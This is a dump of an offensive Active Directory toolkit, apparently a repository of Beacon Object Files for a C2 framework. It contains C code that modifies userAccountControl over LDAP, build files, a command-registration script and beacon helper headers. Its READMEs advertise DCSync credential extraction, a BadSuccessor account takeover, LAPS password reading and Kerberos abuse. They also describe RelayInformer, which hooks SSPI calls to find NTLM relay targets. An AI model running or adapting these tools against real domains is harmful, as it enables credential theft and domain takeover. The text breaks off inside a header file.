            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char uacString[32];
    MSVCRT$_snprintf(uacString, sizeof(uacString), "%lu", newUAC);

    char* uac_values[] = { uacString, NULL };
    LDAPModA uac_mod;
    uac_mod.mod_op = LDAP_MOD_REPLACE;
    uac_mod.mod_type = "userAccountControl";
    uac_mod.mod_vals.modv_strvals = uac_values;

    LDAPModA* mods[] = { &uac_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully set UAC to 0x%08X", newUAC);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set UAC");
        PrintLdapError("Set UAC", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/Makefile
================================================

CC64 = x86_64-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -Os -masm=intel -DBOF -c

all: bof

bof: clean
	# 64-bit builds
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	@($(CC64) $(CFLAGS) ldapsearch/ldapsearch.c -o _bin/ldapsearch.x64.o && $(STRIP64) _bin/ldapsearch.x64.o) && echo '[+] ldapsearch' || echo '[!] ldapsearch'
	@($(CC64) $(CFLAGS) adwssearch/adws_search.c -o _bin/adws_search.x64.o && $(STRIP64) _bin/adws_search.x64.o) && echo '[+] adws_search' || echo '[!] adws_search'
	@($(CC64) $(CFLAGS) readlaps/readlaps.c -o _bin/readlaps.x64.o && $(STRIP64) _bin/readlaps.x64.o) && echo '[+] readlaps' || echo '[!] readlaps'
	@($(CC64) $(CFLAGS) WebDAVClient/EnableWebDAVClient.c -o _bin/webdav_enable.x64.o && $(STRIP64) _bin/webdav_enable.x64.o) && echo '[+] webdav_enable' || echo '[!] webdav_enable'
	@($(CC64) $(CFLAGS) WebDAVClient/StatusWebDAVClient.c -o _bin/webdav_status.x64.o && $(STRIP64) _bin/webdav_status.x64.o) && echo '[+] webdav_status' || echo '[!] webdav_status'
	@ # x86: -DWOW64 -fno-leading-underscore
	@($(CC64) $(CFLAGS) -fno-asynchronous-unwind-tables -nostdlib -fno-ident -fpack-struct=8 -falign-functions=1 -s -ffunction-sections -falign-jumps=1 -w -Wall -shared -Wl,--no-seh -Wl,--enable-stdcall-fixup badtakeover/BadTakeover.c -o _bin/badtakeover.x64.o -DBOF && $(STRIP64) _bin/badtakeover.x64.o) && echo '[+] badtakeover' || echo '[!] badtakeover'


	@$(MAKE) --no-print-directory -C DCSync-BOF
	@mv DCSync-BOF/_bin/* _bin/

	@$(MAKE) --no-print-directory -C RelayInformer
	@$(MAKE) --no-print-directory -C ADCS-BOF
	@$(MAKE) --no-print-directory -C Kerbeus-BOF
	@$(MAKE) --no-print-directory -C SQL-BOF
	@$(MAKE) --no-print-directory -C LDAP-BOF

clean:
	@(rm -rf _bin)


================================================
FILE: AD-BOF/README.md
================================================
# AD-BOF

A BOFs that contains common enumeration and attack methods for Windows Active Directory.

![](_img/01.png)

![](_img/02.png)

![](_img/03.png)

![](_img/04.png)

![](_img/05.png)


## adwssearch

A Beacon Object File (BOF) for Active Directory enumeration through Active Directory Web Services (ADWS) compatible with BOFHound.
- Query AD objects using LDAP filters via ADWS protocol (TCP 9389)
- Automatic DC discovery or specify target DC
- Custom base DN support for querying Configuration, Schema, or other partitions
- Retrieve specific attributes or all attributes
- Automatic pagination for large result sets
- Support for all AD object types (users, computers, groups, PKI objects, trustedDomain, etc.)

```
adwssearch <query> [-a attributes] [--dc dc] [--dn dn]

# Get specific attributes for all users
adwssearch "(objectclass=user)" -a samaccountname,distinguishedname,memberof --dc dc01.domain.local

# Query ADCS Certificate Templates in Configuration partition
adwssearch "(objectClass=pKICertificateTemplate)" -a cn,displayname --dc dc01.domain.local --dn "CN=Configuration,DC=domain,DC=local"
```



## badtakeover

Beacon Object File (BOF) for Using the BadSuccessor Technique for Account Takeover

```
badtakeover <target_ou> <new_dmsa_account> <curren sid> <target_user_dn> <domain>
```



## certi

A library of beacon object files to interact with ADCS servers and certificates. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/AD-BOF/ADCS-BOF/README.md)



## DCSync BOF

A BOF implementation of the DCSync attack for extracting credential material from Active Directory domain controllers. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/AD-BOF/DCSync-BOF/README.md)



## webdav

Enable the WebDAV client service without elevated permissions

```
webdav_enable
```

Check WebDAV client status

```
webdav_status <host1,host2,host3>
```



## kerbeus

Beacon Object Files for Kerberos abuse. This is an implementation of some important features of the [Rubeus](https://github.com/GhostPack/Rubeus) project, written in C. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/AD-BOF/Kerbeus-BOF/README.md)



## ldapsearch

Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)

```
ldapsearch <query> [-a attributes] [-c count>] [-s scope] [--dc dc] [--dn dn] [--ldaps]
```



## ldapq computers

Get a list of hosts in a domain via ldap and save them in TaskManager.

```
ldapq computers
```



## readlaps

Read LAPS password for a computer

```Shell
readlaps [-dc dc] [-dn dn] [-target target] [-target-dn target_dn]
```



## relay-informer

Beacon object files that allow an operator to determine EPA enforcement from a beacon's logon session, without supplying explicit credentials. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/AD-BOF/RelayInformer/README.md)



## mssql

A library of Beacon Object Files to interact with remote SQL servers and data. This collection is templated off the TrustedSec CS-Situational-Awareness-BOF collection and models the functionality of the SQLRecon project. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/AD-BOF/SQL-BOF/README.md)



## Credits
* CS-Situational-Awareness-BOF - https://github.com/trustedsec/CS-Situational-Awareness-BOF
* SQL-BOF - https://github.com/Tw1sm/SQL-BOF
* sekken-enum - https://github.com/Nomad0x7/sekken-enum
* BadTakeover-BOF - https://github.com/logangoins/BadTakeover-BOF
* DCSync-BOF - https://github.com/P0142/DCSync-Bof
* EnableWebDAVClient-BOF - https://github.com/KingOfTheNOPs/EnableWebDAVClient-BOF

================================================
FILE: AD-BOF/RelayInformer/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I common -w -Wno-incompatible-pointer-types -Os -s -DBOF -c

all: bof

bof:
	@(mkdir -p _bin/RelayInformer 2>/dev/null) && echo 'creating _bin/RelayInformer' || echo '_bin/RelayInformer exists'
	@($(CC64) $(CFLAGS) -lws2_32 relay-informer-smb/entry.c -o _bin/RelayInformer/smb.x64.o   && $(STRIP64) _bin/RelayInformer/smb.x64.o) && echo '[+] relay-informer-smb' || echo '[!] relay-informer-smb'
	@($(CC64) $(CFLAGS) -lodbc32 -lws2_32 relay-informer-mssql/entry.c -o _bin/RelayInformer/mssql.x64.o   && $(STRIP64) _bin/RelayInformer/mssql.x64.o) && echo '[+] relay-informer-mssql' || echo '[!] relay-informer-mssql'
	@($(CC64) $(CFLAGS) -lsecur32 -lwinhttp -lcrypt32 -lbcrypt relay-informer-http/entry.c -o _bin/RelayInformer/http.x64.o   && $(STRIP64) _bin/RelayInformer/http.x64.o) && echo '[+] relay-informer-http' || echo '[!] relay-informer-http'
	@($(CC64) $(CFLAGS) -lwldap32 -ldnsapi relay-informer-ldap/entry.c -o _bin/RelayInformer/ldap.x64.o   && $(STRIP64) _bin/RelayInformer/ldap.x64.o) && echo '[+] relay-informer-ldap' || echo '[!] relay-informer-ldap'

clean:
	@(rm -rf _bin)

================================================
FILE: AD-BOF/RelayInformer/README.md
================================================
# Relay Informer BOFs
Beacon object files that allow an operator to determine EPA enforcement from a beacon's logon session, without supplying explicit credentials. Due to reliance on [`sspicli!InitializeSecurityContext`](https://learn.microsoft.com/en-us/windows/win32/api/sspi/nf-sspi-initializesecuritycontextw) API calls, channel binding and target name AV pairs cannot be completely stripped from NTLM messages, meaning EPA enforcement level (required vs allowed/accepted/when supported) cannot be fully inferred. Each BOF is capable of determining if EPA is off or if a greater enforcement level is set. If the distinction between required and allowed/accepted/when supported is important for your use case, the Python `relay-informer` implementation can make this distinction, but requires knowledge of a cleartext credential or NTLM hash.

Only x64 builds are currently supported.

## Available commands
| Commands             | Usage                    | Notes                                                                               |
|----------------------|--------------------------|-------------------------------------------------------------------------------------|
| relay-informer http  | <url>                    | Inform on HTTP(S) service binding enforcement and HTTPS channel binding enforcement |
| relay-informer ldap  | <host\|all>              | Inform on LDAP signing enforcement and LDAPS channel binding enforcement            |
| relay-informer mssql | <host> [port] [database] | Inform on MSSQL service binding and channel binding enforcement                     |
| relay-informer smb   | <host>                   | Inform on SMB2 signing enforcement                                                  |

### AcquireCredentialsHandle
We care about the [pszPackage](https://learn.microsoft.com/en-us/windows/win32/api/sspi/nf-sspi-acquirecredentialshandlea#parameters) parameter because we need to force NTLM authentication. The exception handler for `AcquireCredentialsHandle` monitors the incoming `pszPackage` parameter and flips any `Kerberos` or `Negotiate` references to `NTLM`.

### InitializeSecurityContext
Multiple [parameters](https://learn.microsoft.com/en-us/windows/win32/api/sspi/nf-sspi-initializesecuritycontextw#parameters) are of interest depending on the test (service binding, channel binding, LDAP signing) being performed.

#### HTTP(S) and MSSQL Service Binding
The `pTargetName` parameter influences the `Target Name` AV pair sent to the server in the NTLM type 3 message. To determine if service binding is being enforced, valid target names (e.g., `HTTP/certserver.domain.local`) being passed into the ISC call are invalidated (e.g., `HTTP/relay.informer`).

#### HTTPS, LDAPS and MSSQL Channel Binding
The `pInput` parameter contains a pointer to a [SecBufferDesc](https://learn.microsoft.com/en-us/windows/win32/api/sspi/ns-sspi-secbufferdesc) structure, which will contain the valid channel binding token (CBT) passed into the NTLM type 3 channel bindings AV pair. By locating the valid [SEC_CHANNEL_BINDINGS](https://learn.microsoft.com/en-us/windows/win32/api/sspi/ns-sspi-sec_channel_bindings) structure, we can strip the channel binding application data. Windows will still send a channel bindings AV pair regardless, but when stripped the CBT will be `00000000000000000000000000000000`. If the server rejects this NTLM message, we can infer that EPA is required or accepted/allowed/when supported.

#### LDAP Signing
We can determine if LDAP signing is required by stripping specific flags from the `fContextReq` parameter. By removing the `ISC_REQ_INTEGRITY`, `ISC_REQ_SEQUENCE_DETECT` and `ISC_REQ_CONFIDENTIALITY` flags, we can elicit a [LDAP_STRONG_AUTH_REQUIRED](https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ldap/return-values) error if LDAP signing is required.

## References and Credits
- [CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF)
- [cube0x0](https://x.com/cube0x0) for [LdapSignCheck](https://github.com/cube0x0/LdapSignCheck)
- [VoldeSec](https://x.com/VoldeSec) for [PatchlessInlineExecute-Assembly](https://github.com/VoldeSec/PatchlessInlineExecute-Assembly)

================================================
FILE: AD-BOF/RelayInformer/RelayInformer.axs
================================================
var metadata = {
    name: "RelayInformer-BOF",
    description: "RelayInformer BOFs"
};

let _cmd_informer_http = ax.create_command("http", "Inform on HTTP(S) service binding enforcement and HTTPS channel binding enforcement", "relay-informer http https://test.dom.local");
_cmd_informer_http.addArgString("url", true);
_cmd_informer_http.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let url = parsed_json["url"];

    let bof_params = ax.bof_pack("wstr", [url]);
    let bof_path = ax.script_dir() + "_bin/RelayInformer/http." + ax.arch(id) + ".o";
    let message = "Task: Inform on HTTP(S) service binding enforcement";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



let _cmd_informer_ldap = ax.create_command("ldap", "Inform on LDAP signing enforcement and LDAPS channel binding enforcement", "relay-informer ldap DC");
_cmd_informer_ldap.addArgString("host", true, "host or 'all'");
_cmd_informer_ldap.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let host = parsed_json["host"];

    let bof_params = ax.bof_pack("cstr", [host]);
    let bof_path = ax.script_dir() + "_bin/RelayInformer/ldap." + ax.arch(id) + ".o";
    let message = "Task: Inform on LDAP signing enforcement";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



let _cmd_informer_mssql = ax.create_command("mssql", "Inform on MSSQL service binding and channel binding enforcement", "relay-informer mssql DB");
_cmd_informer_mssql.addArgString("host", true);
_cmd_informer_mssql.addArgInt("port", "", 1433);
_cmd_informer_mssql.addArgString("database", "", "master");
_cmd_informer_mssql.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let host = parsed_json["host"];
    let port = parsed_json["port"];
    let database = parsed_json["database"];

    let bof_params = ax.bof_pack("cstr,int,cstr", [host, port, database]);
    let bof_path = ax.script_dir() + "_bin/RelayInformer/mssql." + ax.arch(id) + ".o";
    let message = "Task: Inform on MSSQL service binding and channel binding enforcement";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



let _cmd_informer_smb = ax.create_command("smb", "Inform on SMB2 signing enforcement", "relay-informer smb DC01");
_cmd_informer_smb.addArgString("host", true);
_cmd_informer_smb.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let host = parsed_json["host"];

    let bof_params = ax.bof_pack("cstr", [host]);
    let bof_path = ax.script_dir() + "_bin/RelayInformer/smb." + ax.arch(id) + ".o";
    let message = "Task: Inform on SMB2 signing enforcement";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});


var cmd_informer = ax.create_command("relay-informer", "AD RelayInformer");
cmd_informer.addSubCommands([ _cmd_informer_http, _cmd_informer_ldap, _cmd_informer_mssql, _cmd_informer_smb ]);

var group_informer = ax.create_commands_group("AD RelayInformer", [cmd_informer]);
ax.register_commands_group(group_informer, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: AD-BOF/RelayInformer/common/base.c
================================================
#include "bofdefs.h"
#include "beacon.h"
#include "time.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);
#ifdef BOF
int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
#else
#define internal_printf printf
#define printoutput 
#define bofstart 
#endif

// Changes to address issue #65.
// We can't use more dynamic resolve functions in this file, which means a call to HeapRealloc is unacceptable.
// To that end if you're going to use this function, declare how many libraries you'll be loading out of, multiple functions out of 1 library count as one
// Normallize your library name to uppercase, yes I could do it, yes I'm also lazy and putting that on the developer.
// Finally I'm going to assume actual string constants are passed in, which is to say don't pass in something to this you plan to free yourself
// If you must then free it after bofstop is called
#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

//GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are gimmie functions
//
// DynamicLoad
// Retrieves a function pointer given the BOF library-function name
// szLibrary           - The library containing the function you want to load
// szFunction          - The Function that you want to load
// Returns a FARPROC function pointer if successful, or NULL if lookup fails
//
FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = Kernel32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = Kernel32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}

void InitRandomSeed()
{
    MSVCRT$srand((unsigned int)MSVCRT$time(NULL));
}

//
// Helper func to generate random strings for prodecure names, etc
//
char* GenerateRandomString(int length)
{
    char* result = (char*)intAlloc(length + 1);
    for (int i = 0; i < length; i++)
    {
        result[i] = (char)(MSVCRT$rand() % 26 + 97);
    }
    result[length] = '\0';
    return result;
}

================================================
FILE: AD-BOF/RelayInformer/common/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Cobalt Strike 4.1.
 */

/* data API */
#pragma once

#ifdef BOF
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_ERROR       0x0d
#define CALLBACK_OUTPUT_UTF8 0x20

DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);

/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
#endif


================================================
FILE: AD-BOF/RelayInformer/common/bofdefs.h
================================================
#pragma once
#pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen)
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <tlhelp32.h>
#include <windns.h>
#include <winldap.h>
#include <wtsapi32.h>
#include <sql.h>
#include <sqlext.h>
#include <stdio.h>
#include <winhttp.h>
#define SECURITY_WIN32
#include <sspi.h>


#ifdef _WIN32
#define STDCALL __stdcall
#else
#define STDCALL
#endif

#ifdef BOF

// KERNEL32
WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
WINBASEAPI int WINAPI Kernel32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
WINBASEAPI int WINAPI Kernel32$MultiByteToWideChar (UINT CodePage, DWORD dwFlags, LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
WINBASEAPI ULONG WINAPI KERNEL32$RemoveVectoredExceptionHandler(PVOID Handle);
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentThread();
WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentThreadId();
WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentProcessId();
WINBASEAPI BOOL WINAPI KERNEL32$GetThreadContext(HANDLE hThread, LPCONTEXT lpContext);
WINBASEAPI BOOL WINAPI KERNEL32$SetThreadContext(HANDLE hThread, const CONTEXT *lpContext);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR lpModuleName);
WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI BOOL WINAPI KERNEL32$GetComputerNameExA(COMPUTER_NAME_FORMAT NameType, LPSTR lpBuffer, LPDWORD nSize);
WINBASEAPI BOOL WINAPI KERNEL32$VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
WINBASEAPI VOID WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);
WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
WINBASEAPI BOOL WINAPI KERNEL32$Thread32First(HANDLE hSnapshot, LPTHREADENTRY32 lpte);
WINBASEAPI BOOL WINAPI KERNEL32$Thread32Next(HANDLE hSnapshot, LPTHREADENTRY32 lpte);
WINBASEAPI HANDLE WINAPI KERNEL32$OpenThread(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId);
WINBASEAPI DWORD WINAPI KERNEL32$SuspendThread(HANDLE hThread);
WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread(HANDLE hThread);


#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)

// MSVCRT
WINBASEAPI int __cdecl MSVCRT$atoi(const char *_Str);
WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI int __cdecl MSVCRT$memcmp(const void *buf1, const void *buf2, size_t count);
WINBASEAPI int __cdecl MSVCRT$rand(void);
WINBASEAPI int __cdecl MSVCRT$srand(unsigned int _Seed);
WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strcat(char * __restrict__ _Dest,const char * __restrict__ _Source);
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2);
DECLSPEC_IMPORT int __cdecl MSVCRT$strncmp(const char *_Str1,const char *_Str2,size_t _MaxCount);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strchr(const char *_Str,int _Ch);
WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strncat(char * __restrict__ _Dest,const char * __restrict__ _Source,size_t _Count);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strncpy(char * __restrict__ _Dest,const char * __restrict__ __src,size_t _Count);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strstr(const char * _Str,const char * _StrSearch);
WINBASEAPI time_t __cdecl MSVCRT$time(time_t *_Time);
WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src);
WINBASEAPI int __cdecl MSVCRT$_strnicmp(const char *_Str1,const char *_Str2, size_t count);
WINBASEAPI void * __cdecl MSVCRT$memmove(void * _Dst, const void * _Src, size_t _MaxCount);

// Provide BOF-local forwarders so compiler-emitted libcalls resolve
//  Cobalt Strike's coffloader whines about unresolved sysmbols without these
void * __cdecl memmove(void *dst, const void *src, size_t n) { return MSVCRT$memmove(dst, src, n); }
size_t __cdecl strlen(const char *s) { return MSVCRT$strlen(s); }

#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size)

// ODBC32
